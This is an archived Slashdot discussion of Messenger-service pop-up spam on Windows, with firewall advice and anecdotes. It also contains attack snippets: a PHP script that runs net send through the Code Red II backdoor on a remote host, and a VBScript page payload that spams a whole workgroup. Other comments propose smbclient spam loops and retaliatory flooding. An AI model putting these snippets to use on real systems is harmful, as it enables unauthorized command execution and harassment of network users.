Slashdot Mirror


Windows/NetBIOS pop-up Spam:

bofus writes "This article from Wired News presents a new way to deliver unsolicited advertising content - the MS Windows Messenger service. It appears that the client software hasn't been widely distributed yet, but it's probably only a matter of time before a free clone is circulating. This method could become the delivery method of choice for all kinds of unsolicited junk, given the number of unsecured PCs out there. On the flip side, if you run a relatively secured machine and have some sort of firewall, this probably shouldn't concern you."


  1. Wonderful... by Dark-One · · Score: 2, Interesting

    I first saw this on my cable modem (before I started using IPTables to share my connection). Then I noticed it on my network on campus. And as I am the administrator I simply blocked the ports on our firewalls. However I can not imagine what students thought when they saw these messages. As a matter of course we disable NT messaging on our servers and all of our faculty/admin machines because it's not needed. However I never thought I would need to block it from the internet. But apparently it's become a big problem. I have heard from a number of students that they have received these messages, all in one day. I suppose that it just means I have to make our firewall all that more restrictive; which I hate to do.

  2. Legality? by DesScorp · · Score: 2, Interesting

    Couldn't law enforcement nail them for using this kind of method? Assuming the spammers in question could be found, of course? This isn't a case where you visit a website, and an affiliate's popup ad appears. The argument could be made that if you visit a site voluntarily, you can't hold them accountable for popups. And while mail spam is annoying, it's legal if certain procedures are followed (but that's another rant entirely). It seems to me that THIS method is so intrusive as to warrant prosecution. Unfortunately, even if I'm right, it's pissing in the wind to hope for any legal redress. If the internet ever dies, it won't be because of government tyranny or the RIAA. It'll die because people will become so fed up with the spam and porn shoveled at them, they'll just turn it off.

    --
    Life is hard, and the world is cruel
  3. already out there by htmlboy · · Score: 5, Interesting

    two weeks ago, we had a big hullabaloo here at uiuc.edu because of this. all the win2k/xp machines on all of campus still running the messenger service got a popup describing how great our lives would be if only we had a diploma from a non-accredited university. most of the "administrative" users assumed it was a virus and panicked. then three more of the same came in this morning.

    i just wish windows would log things like the origin of said messages so the abuse could be addressed at its source.

  4. This is old hat... by Mysticalfruit · · Score: 5, Interesting

    If you've got a machine out on the internet and you've windows networking turned on, you've probably got bigger problems.

    A couple years ago, a co-worker of mine and I were at his house when he turned on windows networking and set his domain to "WORKGROUP", did the obligatory reboot shuffle and started surfing all the shares in the area. It was hilarious, people had their entire C:\ drives shared, etc. Needless to say, after we got him set up with a firewall (linux/maq box) sure enough the logs just rolled with people trying to connect to ports 137/138/139. In one regard many ISPs block the netbios ports on their ingress and egress gateways.

    --
    Yes Francis, the world has gone crazy.
  5. Slap em! :P by Palos · · Score: 3, Interesting

    Saw this a while ago, looks like it could be fun:
    Slap: If you're like me you run firewall software that tells you when someone tries to access your system. Sometimes I respond with a few packets of my own just to let them know that I am paying attention. I wrote Slap to make responding to these access attempts easier and more entertaining. Just enter the IP address of the person you wish to slap and click on the Slap button. The program will attempt to access all the ports in the list and send them a packet with a personal message. (The default message is 'Leave Me Alone!') Slap integrates with Black Ice and Zone Alarm and can use information received from these software firewalls to "Auto Slap" intruders and add their attacks to your list of responses. --Here is a cool Wav file to use with this.

  6. Why would anyone pay for this? by daveman_1 · · Score: 4, Interesting

    $700? You've got to be kidding me. I'm not going to waste the time, but it wouldn't be too difficult to make a perl script that increments an IP address range and calls smbclient -M... In fact, it would be really easy for someone to do this one time and send a link to the tone of "Tired of annoying messages like this? Go to www.xxx.net to find out how to eliminate messages like this forever." And that would be the end of this problem. Unfortunately, if you did this as a regular citizen, you'd have the FBI crashing through your window in no time for "hacking"...

    Sad really.

    --
    Russian Russian Russian RussianDollSig DollSig DollSig DollSig
  7. Re:Instructions for Windows NT/2000/XP Users by afidel · · Score: 4, Interesting

    not everyone needs it but it sure can be useful. Our netapps have the ability to send a message before they are taken offline for maintenance (like we did recently when moving from a couple single filers to a f880 cluster). We also use it with our Samba server to notify the users when their print jobs have cleared the queue (great for plotters or very high traffic lasers).

    --
    There are 4 boxes to use in the defense of liberty: soap, ballot, jury, ammo. Use in that order. Starting now.
  8. better, just drop em -- Re:Slap em! :P by zrodney · · Score: 4, Interesting

    that's cute, but often the ip you have is not the origin, but a hapless victim
    which is being used to launch the attack and/or hide the tracks of the real blackhat

    by sending data back to that ip, you may be unwittingly being used to help the intruder hide
    and you may appear to be the intruder in the logs of the machine which the blackhat is using as a stepping stone

    that's probably not what you are trying to do
    and that's why I just add those ips to a droplist instead of sending data back
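
An added example, not part of the thread or any poster's code: the droplist approach from comment 8 applied to the ports named in comments 4 and 10 (135-139). It parses firewall log lines, ignores internal hosts that may legitimately use NetBIOS, and lists outside sources that probed those ports repeatedly. The log lines, addresses, internal ranges and threshold are constructed assumptions.

```python
import ipaddress
import re
from collections import Counter

# Ports named in the thread: 135-139 (RPC endpoint mapper and NetBIOS).
MESSENGER_PORTS = set(range(135, 140))
# Assumption: these ranges are "ours"; internal NetBIOS traffic is left alone.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "192.168.0.0/16")]

# Constructed sample in the key=value style of the iptables LOG target.
SAMPLE_LOG = """\
Oct 17 09:14:02 gw kernel: NB-IN: IN=eth0 OUT= SRC=198.51.100.23 DST=192.0.2.10 PROTO=UDP SPT=1029 DPT=137
Oct 17 09:14:03 gw kernel: NB-IN: IN=eth0 OUT= SRC=198.51.100.23 DST=192.0.2.10 PROTO=TCP SPT=3321 DPT=139
Oct 17 09:14:05 gw kernel: NB-IN: IN=eth0 OUT= SRC=198.51.100.23 DST=192.0.2.11 PROTO=UDP SPT=1030 DPT=135
Oct 17 09:15:40 gw kernel: NB-IN: IN=eth0 OUT= SRC=203.0.113.77 DST=192.0.2.10 PROTO=UDP SPT=4000 DPT=135
Oct 17 09:16:11 gw kernel: NB-IN: IN=eth1 OUT= SRC=192.168.1.40 DST=192.168.1.2 PROTO=TCP SPT=1025 DPT=139
Oct 17 09:16:12 gw kernel: NB-IN: IN=eth1 OUT= SRC=192.168.1.40 DST=192.168.1.2 PROTO=TCP SPT=1026 DPT=139
Oct 17 09:17:00 gw kernel: NB-IN: IN=eth0 OUT= SRC=198.51.100.99 DST=192.0.2.10 PROTO=TCP SPT=5111 DPT=80
Oct 17 09:17:30 gw kernel: NB-IN: IN=eth0 OUT= SRC=198.51.100.99 DST=192.0.2.10 PROTO=ICMP TYPE=8
"""

FIELD_RE = re.compile(r"\b(SRC|PROTO|DPT)=(\S+)")

def parse_line(line):
    """Return (src_ip, proto, dport), or None if a field is missing or malformed."""
    fields = dict(FIELD_RE.findall(line))
    try:
        return ipaddress.ip_address(fields["SRC"]), fields["PROTO"], int(fields["DPT"])
    except (KeyError, ValueError):
        return None

def build_droplist(log_text, min_hits=2):
    """List external sources with at least min_hits probes of ports 135-139."""
    hits = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        src, proto, dport = rec
        if proto not in ("TCP", "UDP") or dport not in MESSENGER_PORTS:
            continue
        if any(src in net for net in INTERNAL_NETS):
            continue  # internal hosts may have a legitimate use for the service
        hits[str(src)] += 1
    return sorted(ip for ip, n in hits.items() if n >= min_hits)

def as_iptables_rules(droplist):
    """Render drop rules only; nothing is ever sent back to the logged source."""
    return [f"iptables -I INPUT -s {ip} -j DROP" for ip in droplist]
```
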

  9. Re:what client ?!?1 by Anonymous Coward · · Score: 1, Interesting

    NET SEND was suggested months ago in Code Red antidotes. Broadcasting to the attacker's entire domain through the worm's back door for notification.
    <?php
    $fp = fsockopen($REMOTE_ADDR, 80, $en, $es, 5); fputs($fp,
    "GET /scripts/root.exe?/c+net+send+%25USERDOMAIN%25+\"Y our+web+server+$REMOTE_ADDR+is+infected+with+Code+ Red+II.+See+www.incidents.org+for+instructions+on+ how+to+remove.\" HTTP/1.0\r\n\r\n");
    fclose($fp);
    ?>

    There is no file here. I assume you are a Code Red worm. You have been warned.
    </html>
  10. A few points by yar · · Score: 2, Interesting

    Yes, this was talked about earlier. Some of the comments provided then were helpful, others less than so. There was a lot of FUD about how using any form of share or NetBIOS at all meant that you were "already hacked." If an administrator knows what they're doing, that's not true.

    I work at a large university. The obvious solutions don't quite work for us. We'd like to be able to block 135-139. However, some of us are required to use Outlook. *pause* On an Exchange server. *pause* And, we've been told that some of the Outlook functionality depends on the Messenger service being available.

    I block it. But not everyone (particularly some administrative staff and some professors) has the technical knowledge to do so, and some people actually use it.

  11. Re:How to do it by ep32g79 · · Score: 3, Interesting

    I discovered the joys of "net send" back in the eighth grade. I thought it was fun to be able to message my friends at school while they were logged on, admins had disabled the Novell send client.

    I soon began to use a batch file to repeatedly spam them with messages, a little while later I built a Visual C++ program to allow a user to input the user they wished to spam along with their message and how many times to spam them. It was amazing to watch how fast the program I made spread through the junior high.

    After about a week and a half I was called into the office and suspended for 3 days because roughly 56 people in my class used my program to harass their classmates.

  12. We did this to a couple script kiddies by naarok · · Score: 3, Interesting

    At the last place I worked, we had a number of IPs assigned. This made it painfully obvious in the logs when some script kiddie was port scanning us. On a couple occasions we found that the machine scanning us had netsend active and available, so we net sended them telling them to stop port scanning or we would take action. We could just picture the 13 year-old kid at the other end freakin out at this message popping up on their monitor.

  13. Re:Least of your problems. by nuxx · · Score: 2, Interesting

    Can't break into a box remotely as NetBEUI is non-routable. You can't even talk to the box. And if you properly set up NetBEUI (eg: removing the NetBIOS binding to TCP/IP), NetBIOS can't have a problem. I'm assuming for the third point you mean NetBEUI won't cooperate with TCP/IP for bandwidth. Nope, but I doubt that the speed you get off your cable modem will be impacted much by whatever is going around your local network with NetBEUI.

  14. Let me tell you an idea I had.... by mark-t · · Score: 3, Interesting

    Presumably, the messenger service exists because it is perceived as useful. So simply stopping the service may not be seen as particularly constructive.

    What about altering the service so that instead of just popping up a window that you can do nothing with but close, there would exist an additional button [REPLY] on the pop up message window, which would then allow you to respond to the alert message as you see fit? (Sending a message back to the source via the same net send facility that they used to send data to you).

    Now I presume, of course, that an authorized administrator would have a large say in what services are going to be running on the computers in his domain, so if he wasn't interested in fielding replies to his authorized alert messages, he could simply have the requirement that the normal "one-way" messenger is the one that gets installed on the domain machines. Meanwhile, unauthorized sends would find themselves the target of maybe hundreds or thousands of replies, potentially causing a D.O.S. for them, even if they weren't actually running the messenger service themselves.

    Of course, the new messenger service would also log the time, date, and originating IP of the sender, so that it can be confirmed later -- even if the sender does not happen to be running the messenger service himself.

    Now I realize that this doesn't do a thing for handling people who fake their IP address, but I'd bet it would go some distance to making this virtually unusable by most of the people who would just use such tools to spam.

  15. TUSD insecurity by nonweasel · · Score: 2, Interesting

    My school has recently had a big problem with this. Students used a lameass program called NetHail. I remember doing the same thing with smbclient, and a perl script though...

  16. I just got spammed by one of these the other day.. by MontyP · · Score: 3, Interesting

    I come home one night to find one of these on my desktops... I thought it was funny and just happen to have taken a screen shot

    Messenger_Service_Spam.gif

    --


    There is no .sig
  17. Misuse aside.... by AtariDatacenter · · Score: 4, Interesting

    I'm glad to see this feature. When I was managing a very large multiuser application, from time to time, I would have to close some sessions that were causing problems. Or I would see a problem going on, and would like to know more about what they see on their end. But armed with only an IP address and a vague hostname, I could only track them reliably as far as what building they were in. "If only I could hit their walld", I said.

    BTW, at the same time, UNIX users are in for a treat if their syslogd can accept outside messages. (Default behavior on many OSs, but has been changing.)

    Think "kernel.crit".

  18. Hell, one person, hit the whole work group... by woogieoogieboogie · · Score: 2, Interesting

    running 2k or XP
    <script language="VBScript">
    Dim WSHShell
    Set WSHShell = CreateObject("WScript.Shell")
    WSHShell.Run "command /k net send * Hi!!! Why Dont you Buy our Latest product today", 2, False
    Set WSHShell = Nothing
    WScript.Quit(0)
    </script>

    Imagine it in a perpetual loop, everyone in the workgroup would get barraged with popups until the fool who clicked yes to the ActiveX warning was found. Pretty annoying reason to have shut down a network.

    Is this a new security flaw in Windows?

    --
    ... Governments are instituted among Men, deriving their just Powers from the Consent of the Governed...